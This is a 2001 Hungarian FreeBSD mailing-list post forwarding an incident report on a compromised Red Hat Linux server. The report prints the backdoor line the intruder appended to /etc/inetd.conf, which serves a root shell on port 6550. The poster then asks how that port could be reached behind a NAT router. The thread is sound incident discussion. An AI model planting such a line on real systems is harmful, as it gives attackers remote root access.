[FreeBSD] Fwd: Red Hat compromise

Gabor Dolla agdolla at graviton.hu
2001. Május. 17., Cs, 11:15:43 CEST


> 
> Na csak azert, hogy mutassam, hogy nez ki egy valodi betores, meg azt is,
> hogy mennyire nincs jelentosege annak, hogy van-e sshd a gepeden
> egyaltalan, ha a h4x0r ssh-zni akar.
mondjuk az nem derult ki, hogy pontosan milyen hibat hasznaltak ki...

> Our system is a Red Hat Linux v6.2 kernel version 2.2.14-5.0. It was a
> fairly standard installation with HTTP, FTP, SMTP, IMAP, and NNTP, and other
> standard INET services. The system was placed behind a FlowPoint FP2200-22
> SDSL router/firewall with NAT. The ports allowed through the router were 21
> (FTP), 23 (Telnet), 25 (SMTP), 53 (DNS), 80 (HTTP), 110 (POP3) and 143
> (IMAP). Internally, we use Samba for file and printer sharing.
> 
> The first indication of infiltration is the following line was appended to
> the file /etc/inetd.conf:
>     6550 stream tcp nowait root /bin/sh sh -i
> which provides a nice back door and indicates perpetrator had root access.

namarmost: ha a 6550 kivulrol nem tud bejonni, akkor vagy a routert is
atkonfigtak, vagy belulrol jottek
vagy nem volt NAT-olos router a szerver elott
vagy en tok rosszul tudom, es valahogy be lehet menni NAT moge, akkor
viszont valaki vilagositson mar fel...



Gabor




További információk a(z) BSD levelezőlistáról